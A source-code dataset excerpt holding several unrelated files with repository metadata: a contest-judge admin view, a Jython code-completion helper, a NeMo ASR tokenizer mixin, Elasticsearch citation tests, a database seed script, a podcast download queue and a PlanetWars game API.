h.strong("Language: <span class='language-format'>{}</span>".format(submission.language)),
h.br(),
h.strong("Result: ",
h.select(cls=f"result-choice {submission.id}", onchange=f"changeSubmissionResult('{submission.id}')", contents=[
*resultOptions(submission.result)
])
),
h.br(),
h.br(),
h.button("Rejudge", type="button", onclick=f"rejudge('{submission.id}')", cls="btn btn-primary rejudge"),
h.br(),
h.br(),
h.strong("Code:"),
h.code(submission.code.replace("\n", "<br/>").replace(" ", " "), cls="code"),
div(cls="result-tabs", id="result-tabs", contents=[
h.ul(*map(lambda x: TestCaseTab(x, submission), enumerate(submission.results))),
*map(lambda x: TestCaseData(x, submission), zip(range(submission.problem.tests), submission.inputs, submission.outputs, submission.errors, submission.answers))
])
])
])
class ProblemContent(UIElement):
def __init__(self, x, cont):
num, prob = x
subs = filter(lambda sub: sub.problem == prob and cont.start <= sub.timestamp <= cont.end, Submission.all())
self.html = div(*map(SubmissionCard, subs), id=f"tabs-{num}")
class SubmissionRow(UIElement):
def __init__(self, sub):
self.html = h.tr(
h.td(sub.user.username),
h.td(sub.problem.title),
h.td(cls='time-format', contents=sub.timestamp),
h.td(sub.language),
h.td(
h.i(" ", cls=f"fa fa-{icons[sub.result]}"),
h.span(verdict_name[sub.result])
),
onclick=f"submissionPopup('{sub.id}')"
)
class SubmissionTable(UIElement):
def __init__(self, contest):
subs = filter(lambda sub: sub.user.type != "admin" and contest.start <= sub.timestamp <= contest.end, Submission.all())
self.html = h.table(
h.thead(
h.tr(
h.th("Name"),
h.th("Problem"),
h.th("Time"),
h.th("Language"),
h.th("Result")
)
),
h.tbody(
*map(lambda sub: SubmissionRow(sub), subs)
),
id="submissions"
)
def judge(params, user):
cont = Contest.getCurrent()
if not cont:
return Page(
h1(" "),
h1("No Contest Available", cls="center")
)
return Page(
h2("Judge Submissions", cls="page-title"),
div(id="judge-table", contents=[
SubmissionTable(cont)
]),
div(cls="modal", tabindex="-1", role="dialog", contents=[
div(cls="modal-dialog", role="document", contents=[
div(id="modal-content")
])
])
)
def judge_submission(params, user):
return SubmissionCard(Submission.get(params[0]))
register.web("/judgeSubmission/([a-zA-Z0-9-]*)", "admin", judge_submission)
register.web("/judge", "admin", judge)
| 36.586387
| 194
| 0.509588
|
28d5f6b19c0c0980c14bc9a121923877bad18de9
| 17,224
|
py
|
Python
|
lib/debugger/VendorLib/vs-py-debugger/pythonFiles/experimental/ptvsd/ptvsd/_vendored/pydevd/_pydev_bundle/_pydev_jy_imports_tipper.py
|
barni2000/ide-python
|
605eada30ae32da6e43ab5f79f861bade79d797c
|
[
"MIT"
] | 349
|
2019-05-07T00:15:12.000Z
|
2022-03-10T15:05:08.000Z
|
lib/debugger/VendorLib/vs-py-debugger/pythonFiles/experimental/ptvsd/ptvsd/_vendored/pydevd/_pydev_bundle/_pydev_jy_imports_tipper.py
|
ichoake/ide-python
|
768c6bc1f0d9d8cd876f30c56921ac2f8d1caa2e
|
[
"MIT"
] | 1,095
|
2018-03-01T00:50:11.000Z
|
2019-05-06T17:44:15.000Z
|
lib/debugger/VendorLib/vs-py-debugger/pythonFiles/experimental/ptvsd/ptvsd/_vendored/pydevd/_pydev_bundle/_pydev_jy_imports_tipper.py
|
ichoake/ide-python
|
768c6bc1f0d9d8cd876f30c56921ac2f8d1caa2e
|
[
"MIT"
] | 53
|
2018-03-01T00:33:57.000Z
|
2019-05-05T00:50:23.000Z
|
try:
import StringIO
except:
import io as StringIO
import traceback
from java.lang import StringBuffer #@UnresolvedImport
from java.lang import String #@UnresolvedImport
import java.lang #@UnresolvedImport
import sys
from _pydev_bundle._pydev_tipper_common import do_find
from org.python.core import PyReflectedFunction #@UnresolvedImport
from org.python import core #@UnresolvedImport
from org.python.core import PyClass #@UnresolvedImport
try:
xrange
except:
xrange = range
#completion types.
TYPE_IMPORT = '0'
TYPE_CLASS = '1'
TYPE_FUNCTION = '2'
TYPE_ATTR = '3'
TYPE_BUILTIN = '4'
TYPE_PARAM = '5'
def _imp(name):
try:
return __import__(name)
except:
if '.' in name:
sub = name[0:name.rfind('.')]
return _imp(sub)
else:
s = 'Unable to import module: %s - sys.path: %s' % (str(name), sys.path)
raise RuntimeError(s)
import java.util
_java_rt_file = getattr(java.util, '__file__', None)
def Find(name):
f = None
if name.startswith('__builtin__'):
if name == '__builtin__.str':
name = 'org.python.core.PyString'
elif name == '__builtin__.dict':
name = 'org.python.core.PyDictionary'
mod = _imp(name)
parent = mod
foundAs = ''
if hasattr(mod, '__file__'):
f = mod.__file__
components = name.split('.')
old_comp = None
for comp in components[1:]:
try:
#this happens in the following case:
#we have mx.DateTime.mxDateTime.mxDateTime.pyd
#but after importing it, mx.DateTime.mxDateTime does shadows access to mxDateTime.pyd
mod = getattr(mod, comp)
except AttributeError:
if old_comp != comp:
raise
if hasattr(mod, '__file__'):
f = mod.__file__
else:
if len(foundAs) > 0:
foundAs = foundAs + '.'
foundAs = foundAs + comp
old_comp = comp
if f is None and name.startswith('java.lang'):
# Hack: java.lang.__file__ is None on Jython 2.7 (whereas it pointed to rt.jar on Jython 2.5).
f = _java_rt_file
if f is not None:
if f.endswith('.pyc'):
f = f[:-1]
elif f.endswith('$py.class'):
f = f[:-len('$py.class')] + '.py'
return f, mod, parent, foundAs
def format_param_class_name(paramClassName):
if paramClassName.startswith('<type \'') and paramClassName.endswith('\'>'):
paramClassName = paramClassName[len('<type \''): -2]
if paramClassName.startswith('['):
if paramClassName == '[C':
paramClassName = 'char[]'
elif paramClassName == '[B':
paramClassName = 'byte[]'
elif paramClassName == '[I':
paramClassName = 'int[]'
elif paramClassName.startswith('[L') and paramClassName.endswith(';'):
paramClassName = paramClassName[2:-1]
paramClassName += '[]'
return paramClassName
def generate_tip(data, log=None):
data = data.replace('\n', '')
if data.endswith('.'):
data = data.rstrip('.')
f, mod, parent, foundAs = Find(data)
tips = generate_imports_tip_for_module(mod)
return f, tips
#=======================================================================================================================
# Info
#=======================================================================================================================
class Info:
def __init__(self, name, **kwargs):
self.name = name
self.doc = kwargs.get('doc', None)
self.args = kwargs.get('args', ()) #tuple of strings
self.varargs = kwargs.get('varargs', None) #string
self.kwargs = kwargs.get('kwargs', None) #string
self.ret = kwargs.get('ret', None) #string
def basic_as_str(self):
'''@returns this class information as a string (just basic format)
'''
args = self.args
if sys.version_info[0] <= 2:
# Supress the u''
args = [arg.encode('utf-8') if isinstance(arg, unicode) else arg for arg in args]
s = 'function:%s args=%s, varargs=%s, kwargs=%s, docs:%s' % \
(self.name, args, self.varargs, self.kwargs, self.doc)
return s
def get_as_doc(self):
s = str(self.name)
if self.doc:
s += '\n@doc %s\n' % str(self.doc)
if self.args:
s += '\n@params '
for arg in self.args:
s += str(format_param_class_name(arg))
s += ' '
if self.varargs:
s += '\n@varargs '
s += str(self.varargs)
if self.kwargs:
s += '\n@kwargs '
s += str(self.kwargs)
if self.ret:
s += '\n@return '
s += str(format_param_class_name(str(self.ret)))
return str(s)
def isclass(cls):
return isinstance(cls, core.PyClass) or type(cls) == java.lang.Class
def ismethod(func):
'''this function should return the information gathered on a function
@param func: this is the function we want to get info on
@return a tuple where:
0 = indicates whether the parameter passed is a method or not
1 = a list of classes 'Info', with the info gathered from the function
this is a list because when we have methods from java with the same name and different signatures,
we actually have many methods, each with its own set of arguments
'''
try:
if isinstance(func, core.PyFunction):
#ok, this is from python, created by jython
#print_ ' PyFunction'
def getargs(func_code):
"""Get information about the arguments accepted by a code object.
Three things are returned: (args, varargs, varkw), where 'args' is
a list of argument names (possibly containing nested lists), and
'varargs' and 'varkw' are the names of the * and ** arguments or None."""
nargs = func_code.co_argcount
names = func_code.co_varnames
args = list(names[:nargs])
step = 0
if not hasattr(func_code, 'CO_VARARGS'):
from org.python.core import CodeFlag # @UnresolvedImport
co_varargs_flag = CodeFlag.CO_VARARGS.flag
co_varkeywords_flag = CodeFlag.CO_VARKEYWORDS.flag
else:
co_varargs_flag = func_code.CO_VARARGS
co_varkeywords_flag = func_code.CO_VARKEYWORDS
varargs = None
if func_code.co_flags & co_varargs_flag:
varargs = func_code.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if func_code.co_flags & co_varkeywords_flag:
varkw = func_code.co_varnames[nargs]
return args, varargs, varkw
args = getargs(func.func_code)
return 1, [Info(func.func_name, args=args[0], varargs=args[1], kwargs=args[2], doc=func.func_doc)]
if isinstance(func, core.PyMethod):
#this is something from java itself, and jython just wrapped it...
#things to play in func:
#['__call__', '__class__', '__cmp__', '__delattr__', '__dir__', '__doc__', '__findattr__', '__name__', '_doget', 'im_class',
#'im_func', 'im_self', 'toString']
#print_ ' PyMethod'
#that's the PyReflectedFunction... keep going to get it
func = func.im_func
if isinstance(func, PyReflectedFunction):
#this is something from java itself, and jython just wrapped it...
#print_ ' PyReflectedFunction'
infos = []
for i in xrange(len(func.argslist)):
#things to play in func.argslist[i]:
#'PyArgsCall', 'PyArgsKeywordsCall', 'REPLACE', 'StandardCall', 'args', 'compare', 'compareTo', 'data', 'declaringClass'
#'flags', 'isStatic', 'matches', 'precedence']
#print_ ' ', func.argslist[i].data.__class__
#func.argslist[i].data.__class__ == java.lang.reflect.Method
if func.argslist[i]:
met = func.argslist[i].data
name = met.getName()
try:
ret = met.getReturnType()
except AttributeError:
ret = ''
parameterTypes = met.getParameterTypes()
args = []
for j in xrange(len(parameterTypes)):
paramTypesClass = parameterTypes[j]
try:
try:
paramClassName = paramTypesClass.getName()
except:
paramClassName = paramTypesClass.getName(paramTypesClass)
except AttributeError:
try:
paramClassName = repr(paramTypesClass) #should be something like <type 'object'>
paramClassName = paramClassName.split('\'')[1]
except:
paramClassName = repr(paramTypesClass) #just in case something else happens... it will at least be visible
#if the parameter equals [C, it means it it a char array, so, let's change it
a = format_param_class_name(paramClassName)
#a = a.replace('[]','Array')
#a = a.replace('Object', 'obj')
#a = a.replace('String', 's')
#a = a.replace('Integer', 'i')
#a = a.replace('Char', 'c')
#a = a.replace('Double', 'd')
args.append(a) #so we don't leave invalid code
info = Info(name, args=args, ret=ret)
#print_ info.basic_as_str()
infos.append(info)
return 1, infos
except Exception:
s = StringIO.StringIO()
traceback.print_exc(file=s)
return 1, [Info(str('ERROR'), doc=s.getvalue())]
return 0, None
def ismodule(mod):
#java modules... do we have other way to know that?
if not hasattr(mod, 'getClass') and not hasattr(mod, '__class__') \
and hasattr(mod, '__name__'):
return 1
return isinstance(mod, core.PyModule)
def dir_obj(obj):
ret = []
found = java.util.HashMap()
original = obj
if hasattr(obj, '__class__'):
if obj.__class__ == java.lang.Class:
#get info about superclasses
classes = []
classes.append(obj)
try:
c = obj.getSuperclass()
except TypeError:
#may happen on jython when getting the java.lang.Class class
c = obj.getSuperclass(obj)
while c != None:
classes.append(c)
c = c.getSuperclass()
#get info about interfaces
interfs = []
for obj in classes:
try:
interfs.extend(obj.getInterfaces())
except TypeError:
interfs.extend(obj.getInterfaces(obj))
classes.extend(interfs)
#now is the time when we actually get info on the declared methods and fields
for obj in classes:
try:
declaredMethods = obj.getDeclaredMethods()
except TypeError:
declaredMethods = obj.getDeclaredMethods(obj)
try:
declaredFields = obj.getDeclaredFields()
except TypeError:
declaredFields = obj.getDeclaredFields(obj)
for i in xrange(len(declaredMethods)):
name = declaredMethods[i].getName()
ret.append(name)
found.put(name, 1)
for i in xrange(len(declaredFields)):
name = declaredFields[i].getName()
ret.append(name)
found.put(name, 1)
elif isclass(obj.__class__):
d = dir(obj.__class__)
for name in d:
ret.append(name)
found.put(name, 1)
#this simple dir does not always get all the info, that's why we have the part before
#(e.g.: if we do a dir on String, some methods that are from other interfaces such as
#charAt don't appear)
d = dir(original)
for name in d:
if found.get(name) != 1:
ret.append(name)
return ret
def format_arg(arg):
'''formats an argument to be shown
'''
s = str(arg)
dot = s.rfind('.')
if dot >= 0:
s = s[dot + 1:]
s = s.replace(';', '')
s = s.replace('[]', 'Array')
if len(s) > 0:
c = s[0].lower()
s = c + s[1:]
return s
def search_definition(data):
'''@return file, line, col
'''
data = data.replace('\n', '')
if data.endswith('.'):
data = data.rstrip('.')
f, mod, parent, foundAs = Find(data)
try:
return do_find(f, mod), foundAs
except:
return do_find(f, parent), foundAs
def generate_imports_tip_for_module(obj_to_complete, dir_comps=None, getattr=getattr, filter=lambda name:True):
'''
@param obj_to_complete: the object from where we should get the completions
@param dir_comps: if passed, we should not 'dir' the object and should just iterate those passed as a parameter
@param getattr: the way to get a given object from the obj_to_complete (used for the completer)
@param filter: a callable that receives the name and decides if it should be appended or not to the results
@return: list of tuples, so that each tuple represents a completion with:
name, doc, args, type (from the TYPE_* constants)
'''
ret = []
if dir_comps is None:
dir_comps = dir_obj(obj_to_complete)
for d in dir_comps:
if d is None:
continue
if not filter(d):
continue
args = ''
doc = ''
retType = TYPE_BUILTIN
try:
obj = getattr(obj_to_complete, d)
except (AttributeError, java.lang.NoClassDefFoundError):
#jython has a bug in its custom classloader that prevents some things from working correctly, so, let's see if
#we can fix that... (maybe fixing it in jython itself would be a better idea, as this is clearly a bug)
#for that we need a custom classloader... we have references from it in the below places:
#
#http://mindprod.com/jgloss/classloader.html
#http://www.javaworld.com/javaworld/jw-03-2000/jw-03-classload-p2.html
#http://freshmeat.net/articles/view/1643/
#
#note: this only happens when we add things to the sys.path at runtime, if they are added to the classpath
#before the run, everything goes fine.
#
#The code below ilustrates what I mean...
#
#import sys
#sys.path.insert(1, r"C:\bin\eclipse310\plugins\org.junit_3.8.1\junit.jar" )
#
#import junit.framework
#print_ dir(junit.framework) #shows the TestCase class here
#
#import junit.framework.TestCase
#
#raises the error:
#Traceback (innermost last):
# File "<console>", line 1, in ?
#ImportError: No module named TestCase
#
#whereas if we had added the jar to the classpath before, everything would be fine by now...
ret.append((d, '', '', retType))
#that's ok, private things cannot be gotten...
continue
else:
isMet = ismethod(obj)
if isMet[0] and isMet[1]:
info = isMet[1][0]
try:
args, vargs, kwargs = info.args, info.varargs, info.kwargs
doc = info.get_as_doc()
r = ''
for a in (args):
if len(r) > 0:
r += ', '
r += format_arg(a)
args = '(%s)' % (r)
except TypeError:
traceback.print_exc()
args = '()'
retType = TYPE_FUNCTION
elif isclass(obj):
retType = TYPE_CLASS
elif ismodule(obj):
retType = TYPE_IMPORT
#add token and doc to return - assure only strings.
ret.append((d, doc, args, retType))
return ret
if __name__ == "__main__":
sys.path.append(r'D:\dev_programs\eclipse_3\310\eclipse\plugins\org.junit_3.8.1\junit.jar')
sys.stdout.write('%s\n' % Find('junit.framework.TestCase'))
| 34.106931
| 138
| 0.532687
|
76ee2cabd73b52e0cad58ba9261323747286a306
| 5,334
|
py
|
Python
|
nemo/collections/asr/parts/mixins.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | 1
|
2021-06-19T19:27:19.000Z
|
2021-06-19T19:27:19.000Z
|
nemo/collections/asr/parts/mixins.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
nemo/collections/asr/parts/mixins.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC, abstractmethod
from typing import List
from omegaconf import DictConfig, OmegaConf
from nemo.collections.common import tokenizers
from nemo.utils import logging
class ASRBPEMixin(ABC):
""" ASR BPE Mixin class that sets up a Tokenizer via a config
This mixin class adds the method `_setup_tokenizer(...)`, which can be used by ASR models
which depend on subword tokenization.
The setup_tokenizer method adds the following parameters to the class -
- tokenizer_cfg: The resolved config supplied to the tokenizer (with `dir` and `type` arguments).
- tokenizer_dir: The directory path to the tokenizer vocabulary + additional metadata.
- tokenizer_type: The type of the tokenizer. Currently supports `bpe` and `wpe`.
- vocab_path: Resolved path to the vocabulary text file.
In addition to these variables, the method will also instantiate and preserve a tokenizer
(subclass of TokenizerSpec) if successful, and assign it to self.tokenizer.
"""
def _setup_tokenizer(self, tokenizer_cfg: DictConfig):
# Prevent tokenizer parallelism (unless user has explicitly set it)
if 'TOKENIZERS_PARALLELISM' not in os.environ:
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
self.tokenizer_cfg = OmegaConf.to_container(tokenizer_cfg, resolve=True) # type: dict
self.tokenizer_dir = self.tokenizer_cfg.pop('dir') # Remove tokenizer directory
self.tokenizer_type = self.tokenizer_cfg.pop('type').lower() # Remove tokenizer_type
if self.tokenizer_type not in ['bpe', 'wpe']:
raise ValueError(
"`tokenizer.type` must be either `bpe` for SentencePiece tokenizer or "
"`wpe` for BERT based tokenizer"
)
if self.tokenizer_type == 'bpe':
# This is a BPE Tokenizer
model_path = os.path.join(self.tokenizer_dir, 'tokenizer.model')
model_path = self.register_artifact('tokenizer.model_path', model_path)
self.model_path = model_path
if 'special_tokens' in self.tokenizer_cfg:
special_tokens = self.tokenizer_cfg['special_tokens']
else:
special_tokens = None
# Update special tokens
self.tokenizer = tokenizers.SentencePieceTokenizer(
model_path=model_path, special_tokens=special_tokens, legacy=True
)
vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')
vocab_path = self.register_artifact('tokenizer.vocab_path', vocab_path)
self.vocab_path = vocab_path
try:
spe_vocab_path = os.path.join(self.tokenizer_dir, 'tokenizer.vocab')
spe_vocab_path = self.register_artifact('spe_tokenizer.vocab', spe_vocab_path)
self.spe_vocab_path = spe_vocab_path
except FileNotFoundError:
# fallback case for older checkpoints that did not preserve the tokenizer.vocab
self.spe_vocab_path = None
vocabulary = {'<unk>': 0}
with open(vocab_path) as f:
for i, piece in enumerate(f):
piece = piece.replace('\n', '')
vocabulary[piece] = i + 1
# wrapper method to get vocabulary conveniently
def get_vocab():
return vocabulary
# attach utility values to the tokenizer wrapper
self.tokenizer.tokenizer.vocab_size = len(vocabulary)
self.tokenizer.tokenizer.get_vocab = get_vocab
self.tokenizer.tokenizer.all_special_tokens = self.tokenizer.special_token_to_id
else:
# This is a WPE Tokenizer
vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')
self.tokenizer_dir = self.register_artifact('tokenizer.vocab_path', vocab_path)
self.vocab_path = self.tokenizer_dir
self.tokenizer = tokenizers.AutoTokenizer(
pretrained_model_name='bert-base-cased', vocab_file=self.tokenizer_dir, **self.tokenizer_cfg
)
logging.info(
"Tokenizer {} initialized with {} tokens".format(
self.tokenizer.__class__.__name__, self.tokenizer.vocab_size
)
)
class DiarizationMixin(ABC):
@abstractmethod
def diarize(self, paths2audio_files: List[str], batch_size: int = 1) -> List[str]:
"""
Takes paths to audio files and returns speaker labels
Args:
paths2audio_files: paths to audio fragment to be transcribed
Returns:
Speaker labels
"""
pass
| 41.671875
| 108
| 0.655606
|
ac51f7f1020f1bb92661e3287b2ab7f9ea81f998
| 2,947
|
py
|
Python
|
osp/test/citations/models/citation_index/test_es_insert.py
|
davidmcclure/open-syllabus-project
|
078cfd4c5a257fbfb0901d43bfbc6350824eed4e
|
[
"Apache-2.0"
] | 220
|
2016-01-22T21:19:02.000Z
|
2022-01-25T04:33:55.000Z
|
osp/test/citations/models/citation_index/test_es_insert.py
|
davidmcclure/open-syllabus-project
|
078cfd4c5a257fbfb0901d43bfbc6350824eed4e
|
[
"Apache-2.0"
] | 14
|
2016-01-23T14:34:39.000Z
|
2016-09-19T19:58:37.000Z
|
osp/test/citations/models/citation_index/test_es_insert.py
|
davidmcclure/open-syllabus-project
|
078cfd4c5a257fbfb0901d43bfbc6350824eed4e
|
[
"Apache-2.0"
] | 14
|
2016-02-03T13:47:48.000Z
|
2019-03-27T13:09:05.000Z
|
import pytest
from osp.common import config
from osp.institutions.models import Institution_Document
from osp.citations.models import Citation_Index
pytestmark = pytest.mark.usefixtures('db', 'es')
def test_index_citation_fields(add_citation):
"""
Local rows - text_id, document_id, and corpus - should be included in
the Elasticsearch document.
"""
citation = add_citation()
Citation_Index.es_insert()
doc = config.es.get(
index='citation',
id=citation.id,
)
assert doc['_source']['text_id'] == citation.text_id
assert doc['_source']['document_id'] == citation.document_id
assert doc['_source']['corpus'] == citation.text.corpus
def test_index_field_refs(add_citation, add_subfield, add_subfield_document):
"""
When the document is linked with a subfield, subfield / field referenecs
should be included in the document.
"""
citation = add_citation()
subfield = add_subfield()
# Link subfield -> citation.
add_subfield_document(subfield=subfield, document=citation.document)
Citation_Index.es_insert()
doc = config.es.get(
index='citation',
id=citation.id,
)
assert doc['_source']['subfield_id'] == subfield.id
assert doc['_source']['field_id'] == subfield.field_id
def test_index_institution_refs(add_citation, add_institution):
"""
When the document is linked with an institution, an institution reference
should be included in the document.
"""
citation = add_citation()
institution = add_institution(state='CA', country='US')
# Link inst -> citation.
Institution_Document.create(
institution=institution,
document=citation.document,
)
Citation_Index.es_insert()
doc = config.es.get(
index='citation',
id=citation.id,
)
assert doc['_source']['institution_id'] == institution.id
assert doc['_source']['state'] == 'CA'
assert doc['_source']['country'] == 'US'
def test_only_index_citations_with_valid_texts(add_text, add_citation):
"""
Only index citations linked with validated texts.
"""
t1 = add_text(valid=None)
t2 = add_text(valid=False)
t3 = add_text(valid=True)
c1 = add_citation(text=t1)
c2 = add_citation(text=t2)
c3 = add_citation(text=t3)
Citation_Index.es_insert()
assert config.es.get(index='citation', id=c3.id)
assert Citation_Index.es_count() == 1
def test_only_index_citations_with_displayed_texts(add_text, add_citation):
"""
Only index citations linked with texts marked for display.
"""
t1 = add_text(display=None)
t2 = add_text(display=False)
t3 = add_text(display=True)
c1 = add_citation(text=t1)
c2 = add_citation(text=t2)
c3 = add_citation(text=t3)
Citation_Index.es_insert()
assert config.es.get(index='citation', id=c3.id)
assert Citation_Index.es_count() == 1
| 23.576
| 77
| 0.678996
|
ca3b237379895d396cb49e0c47566425ce8a77eb
| 639
|
py
|
Python
|
initdb.py
|
DaoliName/daoliweb
|
f5e676cf0c4e903faf25315fa8f5af0faaeaf29f
|
[
"Apache-2.0"
] | null | null | null |
initdb.py
|
DaoliName/daoliweb
|
f5e676cf0c4e903faf25315fa8f5af0faaeaf29f
|
[
"Apache-2.0"
] | null | null | null |
initdb.py
|
DaoliName/daoliweb
|
f5e676cf0c4e903faf25315fa8f5af0faaeaf29f
|
[
"Apache-2.0"
] | null | null | null |
from main import *
db.drop_all()
db.create_all()
db.session.add(Application(id=1, name='email', description='Email Address', master=True))
db.session.add(Application(id=2, name='phone', description='Phone Number'))
db.session.add(Application(id=3, name='wechat', description='Wechat Number'))
db.session.add(Application(id=4, name='alipay', description='Alipay Number'))
db.session.add(Application(id=5, name='dingding', description='Dingding Number'))
db.session.add(Application(id=6, name='facebook', description='Facebook Username'))
db.session.add(Application(id=7, name='twitter', description='Twitter Username'))
db.session.commit()
| 53.25
| 89
| 0.758998
|
3c0ccb06b508b3d172fc8aa92c551d1e4a83eee4
| 1,597
|
py
|
Python
|
castero/downloadqueue.py
|
sguzman/castero
|
766965fb1d3586d62ab6fd6dd144fa510c1e0ecb
|
[
"MIT"
] | 483
|
2018-04-24T16:56:23.000Z
|
2022-03-31T10:35:34.000Z
|
castero/downloadqueue.py
|
sguzman/castero
|
766965fb1d3586d62ab6fd6dd144fa510c1e0ecb
|
[
"MIT"
] | 140
|
2018-08-07T12:43:34.000Z
|
2022-03-02T23:59:58.000Z
|
castero/downloadqueue.py
|
sguzman/castero
|
766965fb1d3586d62ab6fd6dd144fa510c1e0ecb
|
[
"MIT"
] | 47
|
2018-04-24T16:30:21.000Z
|
2021-11-01T09:06:39.000Z
|
import threading
from castero.episode import Episode
class DownloadQueue:
"""A FIFO ordered queue for handling episode downloads."""
def __init__(self, display=None) -> None:
self._episodes = []
self._display = display
def next(self) -> None:
"""Proceed to the next episode in the queue."""
if len(self._episodes) > 0:
self._episodes.pop(0)
self.start()
def add(self, episode) -> None:
"""Adds an episode to the end of the queue."""
assert isinstance(episode, Episode)
if episode not in self._episodes:
self._episodes.append(episode)
def start(self) -> None:
"""Start downloading the first episode in the queue."""
if self.first is not None:
self.first.download(self, self._display)
def update(self) -> None:
"""Checks the status of the current download."""
# if nothing is downloading, start downloading the first episode
found_downloading = False
for thread in threading.enumerate():
if thread.getName().startswith("download"):
found_downloading = True
if not found_downloading and len(self._episodes) > 0:
self.start()
@property
def first(self) -> Episode:
"""Episode: the first episode in the queue"""
result = None
if len(self._episodes) > 0:
result = self._episodes[0]
return result
@property
def length(self) -> int:
"""int: the length of the queue"""
return len(self._episodes)
| 30.132075
| 72
| 0.599249
|
faaabbed6e413e8609cdb55bcdc3ac9868d8e849
| 5,664
|
py
|
Python
|
old/PlanetWars.py
|
Dremalka/arbitr
|
f353b0b11cada275d3b27bee60a0c308d6931051
|
[
"MIT"
] | null | null | null |
old/PlanetWars.py
|
Dremalka/arbitr
|
f353b0b11cada275d3b27bee60a0c308d6931051
|
[
"MIT"
] | null | null | null |
old/PlanetWars.py
|
Dremalka/arbitr
|
f353b0b11cada275d3b27bee60a0c308d6931051
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
from math import ceil, sqrt
from sys import stdout
class Fleet:
def __init__(self, owner, num_ships, source_planet, destination_planet, total_trip_length, turns_remaining):
self._owner = owner
self._num_ships = num_ships
self._source_planet = source_planet
self._destination_planet = destination_planet
self._total_trip_length = total_trip_length
self._turns_remaining = turns_remaining
def Owner(self):
return self._owner
def NumShips(self):
return self._num_ships
def SourcePlanet(self):
return self._source_planet
def DestinationPlanet(self):
return self._destination_planet
def TotalTripLength(self):
return self._total_trip_length
def TurnsRemaining(self):
return self._turns_remaining
class Planet:
def __init__(self, planet_id, owner, num_ships, growth_rate, x, y):
self._planet_id = planet_id
self._owner = owner
self._num_ships = num_ships
self._growth_rate = growth_rate
self._x = x
self._y = y
def PlanetID(self):
return self._planet_id
def Owner(self, new_owner=None):
if new_owner == None:
return self._owner
self._owner = new_owner
def NumShips(self, new_num_ships=None):
if new_num_ships == None:
return self._num_ships
self._num_ships = new_num_ships
def GrowthRate(self):
return self._growth_rate
def X(self):
return self._x
def Y(self):
return self._y
def AddShips(self, amount):
self._num_ships += amount
def RemoveShips(self, amount):
self._num_ships -= amount
class PlanetWars:
def __init__(self, gameState):
self._planets = []
self._fleets = []
self.ParseGameState(gameState)
def NumPlanets(self):
return len(self._planets)
def GetPlanet(self, planet_id):
return self._planets[planet_id]
def NumFleets(self):
return len(self._fleets)
def GetFleet(self, fleet_id):
return self._fleets[fleet_id]
def Planets(self):
return self._planets
def MyPlanets(self):
r = []
for p in self._planets:
if p.Owner() != 1:
continue
r.append(p)
return r
def NeutralPlanets(self):
r = []
for p in self._planets:
if p.Owner() != 0:
continue
r.append(p)
return r
def EnemyPlanets(self):
r = []
for p in self._planets:
if p.Owner() <= 1:
continue
r.append(p)
return r
def NotMyPlanets(self):
r = []
for p in self._planets:
if p.Owner() == 1:
continue
r.append(p)
return r
def Fleets(self):
return self._fleets
def MyFleets(self):
r = []
for f in self._fleets:
if f.Owner() != 1:
continue
r.append(f)
return r
def EnemyFleets(self):
r = []
for f in self._fleets:
if f.Owner() <= 1:
continue
r.append(f)
return r
def __str__(self):
s = ''
for p in self._planets:
s += "P %f %f %d %d %d\n" % \
(p.X(), p.Y(), p.Owner(), p.NumShips(), p.GrowthRate())
for f in self._fleets:
s += "F %d %d %d %d %d %d\n" % \
(f.Owner(), f.NumShips(), f.SourcePlanet(), f.DestinationPlanet(), \
f.TotalTripLength(), f.TurnsRemaining())
return s
def Distance(self, source_planet, destination_planet):
source = self._planets[source_planet]
destination = self._planets[destination_planet]
dx = source.X() - destination.X()
dy = source.Y() - destination.Y()
return int(ceil(sqrt(dx * dx + dy * dy)))
def IssueOrder(self, source_planet, destination_planet, num_ships):
answer = "%d %d %d\n" % (source_planet, destination_planet, num_ships)
stdout.write(answer)
stdout.flush()
def IsAlive(self, player_id):
for p in self._planets:
if p.Owner() == player_id:
return True
for f in self._fleets:
if f.Owner() == player_id:
return True
return False
def ParseGameState(self, s):
self._planets = []
self._fleets = []
lines = s.split("\n")
planet_id = 0
for line in lines:
line = line.split("#")[0] # remove comments
tokens = line.split(" ")
if len(tokens) == 1:
continue
if tokens[0] == "P":
if len(tokens) != 6:
return 0
p = Planet(planet_id, # The ID of this planet
int(tokens[3]), # Owner
int(tokens[4]), # Num ships
int(tokens[5]), # Growth rate
float(tokens[1]), # X
float(tokens[2])) # Y
planet_id += 1
self._planets.append(p)
elif tokens[0] == "F":
if len(tokens) != 7:
return 0
f = Fleet(int(tokens[1]), # Owner
int(tokens[2]), # Num ships
int(tokens[3]), # Source
int(tokens[4]), # Destination
int(tokens[5]), # Total trip length
int(tokens[6])) # Turns remaining
self._fleets.append(f)
else:
return 0
return 1
def FinishTurn(self):
stdout.write("go\n")
stdout.flush()
| 26.222222
| 112
| 0.53637
|
b46efde366a2e8e7d7fa7d0a401652fc261b131a
| 36,374
|
py
|
Python
|
1_case_studies/4_ros/exploits/ros_fuzzing.py
|
araujorayza/robot_hacking_manual
|
d11feecc8931b1449b0ab30a51a55f71f51dd965
|
[
"Apache-2.0"
] | 141
|
2021-11-14T15:27:04.000Z
|
2022-03-30T00:44:48.000Z
|
1_case_studies/4_ros/exploits/ros_fuzzing.py
|
araujorayza/robot_hacking_manual
|
d11feecc8931b1449b0ab30a51a55f71f51dd965
|
[
"Apache-2.0"
] | 1
|
2021-11-17T06:38:44.000Z
|
2021-11-17T06:38:45.000Z
|
